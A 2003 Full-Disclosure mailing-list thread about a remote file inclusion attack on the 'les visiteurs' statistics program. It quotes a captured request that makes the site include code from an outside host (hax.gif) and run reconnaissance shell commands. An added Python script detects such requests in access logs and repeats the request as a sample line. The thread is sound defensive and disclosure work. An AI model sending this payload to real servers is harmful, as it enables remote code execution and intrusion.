[Full-Disclosure] file inclusion (les visiteurs)

gazpa gazpa at euskalnet.net
Tue Dec 2 00:09:51 GMT 2003


Hi Lorenzo,
First, there isn't *their server*. It's someone else's server 
(c2r.canalforbid.org).
Second, they use this server to serve an include file (hax.gif), a PHP 
include to *inject* into the buggy 'les visiteurs' (web statistics 
program) remotely and execute shell commands.
And I don't think they are kiddies, if they wrote 'hax.gif', as it seems.
Don't blame people who are only intending to advise people about a bug 
that is being exploited.

Lorenzo Hernandez Garcia-Hierro wrote:

>Hi Daniel,
>They are kiddies... :(
>I was looking at the files and there are only high-risk-rated exploits
>downloaded from Packet Storm, ptrace, etc.
>And they are running remote PHP shells on their server.... xD
>
>See you in the IRC tonight ?
>
>
>>"Evert Daman" <evert at digipix.org> wrote:
>>
>>
>>>last night snort detected this request:
>>>
>>>GET /counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls
>>>
>>>
>>>because I patched 'les visiteurs' as described by 'Matthieu Peschaud'
>>>on Bugtraq on the 26th of October nothing happened, but it looks like someone is trying to exploit this bug.
>>>just want to mention it to this wonderful list :)
>>>
>>>
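The request Evert's Snort sensor caught is a remote file inclusion probe: the `lvc_include_dir` parameter is given a URL instead of a local directory, so the vulnerable include pulls and executes code from the attacker-controlled host. The script below is an added example (not code from anyone in this thread or from the 'les visiteurs' project) that scans Apache combined-format access logs for the same class of request: any query parameter whose URL-decoded value begins with a scheme such as `http://` or `ftp://`. The log lines are constructed for illustration; the first reproduces the request quoted above, the third uses the placeholder host `example.invalid` with a percent-encoded scheme to show that decoding and case-insensitive matching matter.

```python
"""Flag remote-file-inclusion (RFI) probes in web server access logs.

Added example for the 'les visiteurs' thread. It looks for query
parameters whose decoded value is a remote URL, which is how a
path/directory include parameter gets abused. Log lines, IPs and the
example.invalid host below are constructed samples.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" format; we only need client IP, time, request and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3})'
)

# A value starting with "<scheme>://" is a remote-include candidate no
# matter which parameter carries it (the vulnerable one here is lvc_include_dir).
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.IGNORECASE)


def parse_query(query):
    """Split a raw query string into decoded (name, value) pairs.

    Splits on '&' only, so a value such as 'cd /tmp;uname -a' keeps its ';'
    (some parsers also split on ';', which would hide the payload).
    """
    pairs = []
    for part in query.split('&'):
        if not part:
            continue
        name, _, value = part.partition('=')
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def find_rfi_params(target):
    """Return (name, value) pairs whose decoded value is a remote URL."""
    query = urlsplit(target).query
    return [(n, v) for n, v in parse_query(query) if SCHEME_RE.match(v)]


def scan_log(lines):
    """Return one alert per log line that carries a remote-URL parameter."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unexpected format: skip rather than guess
        target = m.group('target')
        hits = find_rfi_params(target)
        if hits:
            alerts.append({
                'ip': m.group('ip'),
                'time': m.group('time'),
                'path': urlsplit(target).path,
                'params': hits,                        # the offending parameters
                'all_params': parse_query(urlsplit(target).query),  # analyst context
                'status': int(m.group('status')),
            })
    return alerts


# Constructed sample lines (Apache combined format, truncated after status/size).
LOG_LINES = [
    '10.0.0.5 - - [01/Dec/2003:23:58:10 +0000] "GET /counter/include/new-visitor.inc.php'
    '?lvc_include_dir=http://c2r.canalforbid.org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;'
    'cat%20/proc/version;ls HTTP/1.0" 200 512',
    '10.0.0.9 - - [01/Dec/2003:23:59:02 +0000] "GET /counter/index.php?page=stats HTTP/1.1" 200 2048',
    '10.0.0.7 - - [02/Dec/2003:00:01:44 +0000] "GET /counter/include/new-visitor.inc.php'
    '?lvc_include_dir=HTTP%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 404 210',
]

if __name__ == '__main__':
    for alert in scan_log(LOG_LINES):
        print(f"{alert['time']} {alert['ip']} {alert['path']} status={alert['status']}")
        for name, value in alert['params']:
            print(f"    remote include via {name}={value}")
```

Two of the three constructed lines are flagged; the ordinary `page=stats` request is not. The second alert has HTTP status 404, which matches Evert's situation (a patched install answering an attempt that fails); a 200 on such a request, as in the first line, is the one to treat as a possible compromise and investigate on the host.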

Full-Disclosure is hosted and sponsored by Secunia.